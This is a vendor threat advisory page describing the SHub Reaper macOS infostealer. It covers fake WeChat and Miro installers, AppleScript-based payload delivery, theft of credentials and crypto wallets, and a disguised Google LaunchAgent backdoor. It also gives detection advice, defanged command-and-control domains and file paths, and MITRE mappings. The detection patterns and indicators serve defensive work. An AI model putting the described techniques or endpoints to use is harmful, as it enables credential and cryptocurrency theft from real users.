Threat Advisories:
CVE-2026-34926: Trend Micro Apex One Under Active Exploitation CVE-2026-5426: Hard-Coded Machine Keys Open Door to RCE CVE-2026-9082 Opens the Door to Remote SQL Injection on Drupal Gemini on Payroll: A Solo Actor Outsources a Five-Year Influence Op to AI CVE-2026-48172: Critical LiteSpeed cPanel Flaw Actively Exploited SHub Reaper A macOS Stealer Wearing Three Trusted Masks 72-Hour Window of Trust: Fox Tempest’s Abuse of Microsoft Artifact Signing May 2026 Linux Patch Roundup From npm to GitHub: TeamPCP’s May 2026 Escalation Reaches the Source Code Platform Inside Storm-2949’s Cloud Takeover Campaign Targeting Microsoft 365 and Azure Dead.Letter Walking: Unauthenticated RCE Stalks Exim Mail Servers One Million WordPress Sites at Risk: Avada Builder Flaws Expose Sensitive Data Three Strikes in Two Weeks: Fragnesia Joins the Dirty Frag Family Critical NGINX Vulnerabilities Including 18-Year-Old RCE Flaw Actively Exploited Active Exploitation of CVE-2026-42897 Targets Microsoft Exchange Servers FamousSparrow’s Persistent Hold on Azerbaijani Oil & Gas Cisco SD-WAN Authentication Bypass Exploited in Zero-Day Attacks Mini Shai-Hulud npm Supply Chain Worm: TanStack and Multi-Ecosystem Compromise Malicious Ruby Gems Fuel GemStuffer Data Theft Campaign Microsoft’s May 2026 Patch Tuesday
New Report Critical Threat Research : The Iranian Cyber War Intensifies! Download the Report
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them. Powered by:
IntegrationsOut of box integrations available with a comprehensive set of Security and IT operations tools in your organisation.
HiveForce LabsThe in-house intelligence that enables customers to identify and address immediate cyber risks and potential threats with precision, clear insights, and swift action.
Hive Pro’s ComparisonSave Cost , Reduce Complexity and Increase Security by Augmenting and Replacing your existing Vulnerability Management platform
Hive Pro vs Rapid7
Hive Pro vs Tenable
Hive Pro vs Qualys
Hive Pro vs Nucleus Security
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Learning Center
Podcasts
Threat Advisories
Threat Digests
Blog
Whitepapers
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Whitepapers
Press Releases
connect
Webinars & Videos
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoFree Iranian Exposure Assessment
Platform
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them. Powered by:
IntegrationsOut of box integrations available with a comprehensive set of Security and IT operations tools in your organisation.
HiveForce LabsThe in-house intelligence that enables customers to identify and address immediate cyber risks and potential threats with precision, clear insights, and swift action.
Hive Pro’s Comparison
Hive Pro vs Rapid7
Hive Pro vs Tenable
Hive Pro vs Qualys
Hive Pro vs Nucleus Security
Solutions
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Resources
Learning Center
Podcasts
Threat Advisories
Threat Digests
Blog
Whitepapers
Resources
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Whitepapers
Press Releases
connect
Webinars & Videos
Company
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoFree Iranian Exposure Assessment

SHub Reaper A macOS Stealer Wearing Three Trusted Masks

Amber | Attack Report
Download PDF

Summary

SHub Reaper is a newly identified macOS infostealer malware first detected in 2026, targeting users globally — excluding the Commonwealth of Independent States (CIS). This advanced macOS credential-stealing malware chains together three trusted brand impersonations — Apple, Google, and Microsoft — within a single, sophisticated attack chain. Victims of the SHub Reaper macOS stealer are lured via fake WeChat and Miro installers, coerced into executing a fraudulent Apple security update, and silently stripped of browser credentials, Keychain data, and cryptocurrency wallet assets.

The SHub Reaper macOS malware establishes long-term persistence by masquerading as a Google Software Update LaunchAgent, providing attackers a persistent remote code execution backdoor that survives system reboots. This macOS infostealer threat poses a significant risk to cryptocurrency holders, enterprise users, and individuals using major browsers and password managers on macOS systems.

First Seen
2026
Malware
SHub Reaper
Platform
macOS
Targeted Regions
Global (excl. CIS)
Report Type
Attack Report
Threat Level
Amber
Targeted products & applications

Impersonated lures: WeChat, Miro, Apple XProtectRemediator, Google Software Update. Targeted browsers: Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, Orion. Password managers: 1Password, Bitwarden, LastPass. Browser-extension wallets: MetaMask, Phantom. Desktop crypto wallets: Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, Electrum, Trezor Suite. System data: macOS Keychain, iCloud account data, Telegram session data.

Attack Details

The SHub Reaper macOS infostealer attack unfolds in four distinct phases, combining social engineering, anti-analysis evasion, credential harvesting, and persistent backdoor installation on macOS systems.

Phase 1 — Initial access via fake installers & victim profiling
1
The SHub Reaper macOS stealer attack begins on fake installer pages impersonating WeChat and Miro download sites, hosted on typosquatted domains designed to mimic Microsoft and other trusted brands. Before delivering any macOS malware payload, the malicious page silently profiles the visitor — capturing IP address, geolocation, graphics fingerprint, and signs of virtual machines or VPNs — while also enumerating installed browser-based password managers and cryptocurrency wallet extensions. Developer tools are blocked, debugging keystrokes are trapped, and a Russian “Access Denied” screen is displayed if analysis is suspected. All collected visitor profiling data is exfiltrated via a Telegram bot to the attackers.
Phase 2 — AppleScript-based execution & in-memory payload delivery
2
Once a viable macOS target is identified, SHub Reaper bypasses Apple’s “paste into Terminal” fix by launching macOS Script Editor with a pre-loaded malicious AppleScript. The harmful command is hidden below ASCII art and fake installer text, invisible to the user. Clicking “Run” triggers a convincing “Downloading Apple Security Update” message while silently fetching and executing the next-stage macOS malware payload. The stealer performs a Russian language check and exits if detected; otherwise it downloads and runs the main stealer script entirely in memory — leaving no artifacts on disk — evading traditional file-based macOS endpoint detection.
Phase 3 — Credential harvesting, data exfiltration & document theft
3
SHub Reaper displays a fake macOS password prompt to capture the user’s login credentials, then harvests data across all major browsers (Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, Orion), macOS Keychain, iCloud account data, Telegram session data, and cryptocurrency wallets including Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite. A document-stealing module modelled on Atomic macOS Stealer (AMOS) sweeps Desktop and Documents folders for business and financial files up to 150 MB, automatically splitting large collections into chunked ZIP archives for upload to the attacker’s command-and-control (C2) server.
Phase 4 — Crypto wallet hijacking & persistent backdoor installation
4
After initial macOS credential theft, SHub Reaper compromises installed cryptocurrency wallets by replacing their core app.asar files with tampered copies from the attacker’s server, enabling interception of future crypto transactions. For persistence, the macOS malware disguises itself as a Google Software Update component, registering a LaunchAgent background task that beacons every 60 seconds. This persistent backdoor downloads and executes attacker commands with user privileges — and survives system reboots — giving threat actors prolonged remote access to the compromised macOS host.

Recommendations

Security teams and macOS administrators should implement the following defensive measures to detect and mitigate SHub Reaper macOS infostealer attacks:

Monitor for suspicious AppleScript and osascript activity
Alert on osascript and Script Editor processes that spawn curlzsh, or sh child processes; on Script Editor execution within seconds of browser activity; and on AppleScript invocations reading com.apple.HIToolbox.plist or writing to /tmp/shub_ paths.
Detect staging and chunked exfiltration
Build EDR detections for newly created directories matching /tmp/shub_, the helper script /tmp/shub_split.sh, and ZIP archives matching /tmp/shub_mzip_*.zip, especially when followed by outbound curl requests to unfamiliar HTTPS endpoints.
Detect cryptocurrency wallet app.asar tampering
File-integrity-monitor the app.asar files inside Exodus, Atomic Wallet, Ledger Live, Ledger Wallet, Electrum, and Trezor Suite installations. Trigger alerts on xattr -cr invocations against application bundles and on codesign operations producing ad hoc signatures on wallet binaries.
Enforce application allow-listing and strict code-signing verification
Use Apple’s Endpoint Security framework, third-party EDR solutions, or Santa to allow-list approved applications and alert on execution of ad hoc-signed or unsigned binaries, particularly those written into application bundles such as modified app.asar files used by SHub Reaper for macOS wallet hijacking.
Inspect for anti-analysis web fingerprinting
Tune web proxy and browser-isolation telemetry to flag pages performing WebGL fingerprinting, VM/VPN detection, browser-extension enumeration, and continuous-debugger loops. These behaviors precede SHub Reaper macOS malware payload delivery and are common across the broader SHub infostealer family.

Indicators of Compromise (IoCs)

The following indicators of compromise (IoCs) are associated with the SHub Reaper macOS infostealer campaign. Security teams should block these domains, URLs, and monitor for these file paths across macOS endpoints.

Type Value
Domains hebsbsbzjsjshduxbs[.]xyz
qq-0732gwh22[.]com
mlcrosoft[.]co[.]com
mlroweb[.]com
URLs hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/api/debug/event
hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/api/bot/heartbeat
hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/gate
hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/gate/chunk
File Paths ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate
~/Library/LaunchAgents/com.google.keystone.agent.plist
/tmp/shub_log.zip
/tmp/shub_split.sh
/tmp/shub_mzip_*.zip
/tmp/.c.sh
/tmp/*_asar.zip

MITRE ATT&CK TTPs

The SHub Reaper macOS infostealer campaign maps to the following MITRE ATT&CK tactics and techniques:

Tactic Technique Sub-technique
Resource Development T1583: Acquire Infrastructure T1583.001: Domains
Initial Access T1189: Drive-by Compromise
Execution T1059: Command and Scripting Interpreter T1059.002: AppleScript
T1059: Command and Scripting Interpreter T1059.004: Unix Shell
T1204: User Execution T1204.002: Malicious File
Persistence T1543: Create or Modify System Process T1543.001: Launch Agent
Defense Evasion T1036: Masquerading T1036.005: Match Legitimate Resource Name or Location
T1140: Deobfuscate/Decode Files or Information
T1553: Subvert Trust Controls T1553.001: Gatekeeper Bypass
T1553: Subvert Trust Controls T1553.002: Code Signing
T1497: Virtualization/Sandbox Evasion T1497.001: System Checks
T1622: Debugger Evasion
Credential Access T1056: Input Capture T1056.002: GUI Input Capture
T1555: Credentials from Password Stores T1555.001: Keychain
T1555: Credentials from Password Stores T1555.003: Credentials from Web Browsers
T1555: Credentials from Password Stores T1555.005: Password Managers
Discovery T1083: File and Directory Discovery
T1217: Browser Information Discovery
T1614: System Location Discovery T1614.001: System Language Discovery
Collection T1005: Data from Local System
T1560: Archive Collected Data T1560.001: Archive via Utility
T1074: Data Staged T1074.001: Local Data Staging
Command & Control T1071: Application Layer Protocol T1071.001: Web Protocols
T1105: Ingress Tool Transfer
Exfiltration T1041: Exfiltration Over C2 Channel
T1567: Exfiltration Over Web Service
Impact T1565: Data Manipulation T1565.001: Stored Data Manipulation

References

SentinelOne — SHub Reaper: macOS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain
https://www.sentinelone.com/blog/shub-reaper-macos-stealer-spoofs-apple-google-andmicrosoft-in-a-single-attack-chain/

What’s new on HivePro

Get through updates and upcoming events, and more directly in your inbox